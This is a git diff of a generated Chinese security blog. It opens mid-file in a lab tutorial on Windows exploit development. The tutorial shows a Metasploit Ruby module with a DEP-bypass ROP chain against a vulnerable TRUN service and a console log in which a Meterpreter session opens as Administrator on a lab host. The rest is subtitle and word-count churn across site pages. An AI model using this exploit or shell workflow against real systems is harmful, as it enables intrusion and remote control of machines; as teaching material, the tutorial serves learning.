class="number">0x77e6c784</span>,  <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77dc560a</span>,  <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x7c87fbcb</span>,  <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line">      <span class="number">0xffffffc0</span>,  <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line">      <span class="number">0x77d4493b</span>,  <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x77c28fbc</span>,  <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x77bef7c9</span>,  <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x7c99bac1</span>,  <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x719e4870</span>,  <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line">      <span class="number">0x77e6d224</span>,  <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77e8c50c</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x90909090</span>,  <span class="comment"># nop</span></span><br><span class="line">      <span class="number">0x77de60c7</span>,  <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line">    ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rop_gadgets</span><br><span class="line"></span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="comment"># Call the ROP chain generator inside the 'exploit' function :</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  rop_chain = create_rop_chain()</span><br></pre></td></tr></table></figure></p>
 <h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span>(update_info(info,</span><br><span class="line">      <span class="string">'Name'</span>           =&gt; <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line">      <span class="string">'Description'</span>    =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">        		  DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string">      			  &#125;</span>,</span><br><span class="line">      <span class="string">'Platform'</span>       =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">      <span class="string">'Author'</span>         =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line">      <span class="string">'Payload'</span>        =&gt;</span><br><span class="line">        		  &#123;</span><br><span class="line">          		  <span class="string">'space'</span>     =&gt; <span class="number">312</span>,</span><br><span class="line">          		  <span class="string">'BadChars'</span>  =&gt; <span class="string">"\x00"</span></span><br><span class="line">        		  &#125;,</span><br><span class="line">      <span class="string">'Targets'</span>        =&gt;</span><br><span class="line">      		  	  [</span><br><span class="line">          		    [</span><br><span class="line">			    <span class="string">'Windows XP'</span>,</span><br><span class="line">			    &#123;<span class="string">'Offset'</span>  =&gt; find it&#125;</span><br><span class="line">			    ]</span><br><span class="line">        		  ],</span><br><span class="line">      <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-01-16'</span>))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line">    rop_gadgets =</span><br><span class="line">    [</span><br><span class="line">      <span class="number">0x77dabf34</span>,  <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x6250609c</span>,  <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77d1927f</span>,  <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x7c96d192</span>,  <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x77bef671</span>,  <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x625011af</span>,  <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77e9ad22</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0xfffffdff</span>,  <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line">      <span class="number">0x77e6c784</span>,  <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77dc560a</span>,  <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x7c87fbcb</span>,  <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line">      <span class="number">0xffffffc0</span>,  <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line">      <span class="number">0x77d4493b</span>,  <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x77c28fbc</span>,  <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x77bef7c9</span>,  <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x7c99bac1</span>,  <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x719e4870</span>,  <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line">      <span class="number">0x77e6d224</span>,  <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77e8c50c</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x90909090</span>,  <span class="comment"># nop</span></span><br><span class="line">      <span class="number">0x77de60c7</span>,  <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line">    ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rop_gadgets</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    rop_chain = create_rop_chain()</span><br><span class="line">    junk = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    buf = <span class="string">"TRUN ."</span> + junk + rop_chain + make_nops(<span class="number">16</span>) + payload.encoded + <span class="string">'\r\n'</span></span><br><span class="line">    sock.put(buf)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
-<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; <span class="keyword">set</span> rhosts <span class="comment">192.168.31.114</span></span><br><span class="line">rhosts <span class="comment">=&gt; 192.168.31.114</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; set rport 1000</span></span><br><span class="line">rport <span class="comment">=&gt; 1000</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">reverse TCP handler on 192.168.31.84:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; set payload windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">payload <span class="comment">=&gt; windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Sending <span class="comment">stage (179779 bytes) to 192.168.31.114</span></span><br><span class="line">[*] Meterpreter <span class="comment">session 1 opened (192.168.31.84:44537 -&gt; 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span></span><br><span class="line"></span><br><span class="line">meterpreter <span class="comment">&gt; getuid</span></span><br><span class="line">Server <span class="comment">username: WHU-3E3EECEBFD1\Administrator</span></span><br></pre></td></tr></table></figure>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:44537 -&gt; 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
 
       
     </div>
@@ -795,7 +798,7 @@
             
 
             
-              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-漏洞利用开发简介"><span class="nav-text">0x00 漏洞利用开发简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简单栈溢出"><span class="nav-text">0x01 简单栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞点"><span class="nav-text">漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关闭防御措施"><span class="nav-text">关闭防御措施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#整体的攻击流程："><span class="nav-text">整体的攻击流程：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找jmp-esp跳板"><span class="nav-text">寻找jmp esp跳板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于SEH的栈溢出"><span class="nav-text">0x02 基于SEH的栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置-1"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找PPR"><span class="nav-text">寻找PPR</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-1"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-绕过DEP"><span class="nav-text">0x03 绕过DEP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#设置DEP保护"><span class="nav-text">设置DEP保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#计算偏移量"><span class="nav-text">计算偏移量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建ROP链"><span class="nav-text">创建ROP链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-2"><span class="nav-text">自动化攻击</span></a></li></ol></li></ol></div>
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-漏洞利用开发简介"><span class="nav-text">0x00 漏洞利用开发简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简单栈溢出"><span class="nav-text">0x01 简单栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞点"><span class="nav-text">漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关闭防御措施"><span class="nav-text">关闭防御措施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#整体的攻击流程"><span class="nav-text">整体的攻击流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找jmp-esp跳板"><span class="nav-text">寻找jmp esp跳板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于SEH的栈溢出"><span class="nav-text">0x02 基于SEH的栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置-1"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找PPR"><span class="nav-text">寻找PPR</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-1"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-绕过DEP"><span class="nav-text">0x03 绕过DEP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#设置DEP保护"><span class="nav-text">设置DEP保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#计算偏移量"><span class="nav-text">计算偏移量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建ROP链"><span class="nav-text">创建ROP链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-2"><span class="nav-text">自动化攻击</span></a></li></ol></li></ol></div>
             
 
           </div>
@@ -827,7 +830,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/about/index.html b/about/index.html
index bdeb05ef..ccf78e0e 100644
--- a/about/index.html
+++ b/about/index.html
@@ -160,7 +160,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -460,7 +460,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2000/01/index.html b/archives/2000/01/index.html
index 10d19956..8c4fac80 100644
--- a/archives/2000/01/index.html
+++ b/archives/2000/01/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2000/index.html b/archives/2000/index.html
index 9552f3b0..4a39d380 100644
--- a/archives/2000/index.html
+++ b/archives/2000/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2018/11/index.html b/archives/2018/11/index.html
index 8832fadb..134c200c 100644
--- a/archives/2018/11/index.html
+++ b/archives/2018/11/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2018/12/index.html b/archives/2018/12/index.html
index 65baaa63..41c08dd9 100644
--- a/archives/2018/12/index.html
+++ b/archives/2018/12/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -560,7 +560,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2018/index.html b/archives/2018/index.html
index 5715b48a..a7013270 100644
--- a/archives/2018/index.html
+++ b/archives/2018/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -595,7 +595,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/01/index.html b/archives/2019/01/index.html
index 59ec5bab..e85e7421 100644
--- a/archives/2019/01/index.html
+++ b/archives/2019/01/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/02/index.html b/archives/2019/02/index.html
index 90815587..1579d9e7 100644
--- a/archives/2019/02/index.html
+++ b/archives/2019/02/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/03/index.html b/archives/2019/03/index.html
index 45aec974..279f3d0d 100644
--- a/archives/2019/03/index.html
+++ b/archives/2019/03/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -595,7 +595,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/04/index.html b/archives/2019/04/index.html
index aa695d81..daab5cb0 100644
--- a/archives/2019/04/index.html
+++ b/archives/2019/04/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -525,7 +525,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/05/index.html b/archives/2019/05/index.html
index 8306acc6..20ed2c8f 100644
--- a/archives/2019/05/index.html
+++ b/archives/2019/05/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -525,7 +525,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/07/index.html b/archives/2019/07/index.html
index 9eb3cdb8..42a8a103 100644
--- a/archives/2019/07/index.html
+++ b/archives/2019/07/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -560,7 +560,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/index.html b/archives/2019/index.html
index 1d38df15..ac306399 100644
--- a/archives/2019/index.html
+++ b/archives/2019/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -809,7 +809,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/2019/page/2/index.html b/archives/2019/page/2/index.html
index eb8657c3..fb1c983e 100644
--- a/archives/2019/page/2/index.html
+++ b/archives/2019/page/2/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -564,7 +564,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/index.html b/archives/index.html
index 77bcc75d..a7efe5c8 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -809,7 +809,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/archives/page/2/index.html b/archives/page/2/index.html
index 952571a8..f30c32c6 100644
--- a/archives/page/2/index.html
+++ b/archives/page/2/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -749,7 +749,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/baidusitemap.xml b/baidusitemap.xml
index c7867d3c..39493904 100644
--- a/baidusitemap.xml
+++ b/baidusitemap.xml
@@ -1,6 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   <url>
+    <loc>https://cool-y.github.io/2019/04/21/XIAOMI-UPnP/</loc>
+    <lastmod>2019-07-11</lastmod>
+  </url>  <url>
     <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
     <lastmod>2019-07-10</lastmod>
   </url>  <url>
@@ -21,9 +24,6 @@
   </url>  <url>
     <loc>https://cool-y.github.io/2019/03/28/%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B%E5%AE%9E%E9%AA%8C/</loc>
     <lastmod>2019-05-07</lastmod>
-  </url>  <url>
-    <loc>https://cool-y.github.io/2019/04/21/XIAOMI-UPnP/</loc>
-    <lastmod>2019-05-05</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/04/15/Caving-db-storage/</loc>
     <lastmod>2019-04-15</lastmod>
diff --git a/bookmarks/index.html b/bookmarks/index.html
index fed7012c..1e18c07f 100644
--- a/bookmarks/index.html
+++ b/bookmarks/index.html
@@ -160,7 +160,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -512,7 +512,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/categories/IOT/index.html b/categories/IOT/index.html
index 77ee795a..cc0ef4d7 100644
--- a/categories/IOT/index.html
+++ b/categories/IOT/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -549,7 +549,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/categories/index.html b/categories/index.html
index eb011fc6..d2616440 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -157,7 +157,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -462,7 +462,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/categories/二进制/index.html b/categories/二进制/index.html
index 0887d577..d2b6485e 100644
--- a/categories/二进制/index.html
+++ b/categories/二进制/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -601,7 +601,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
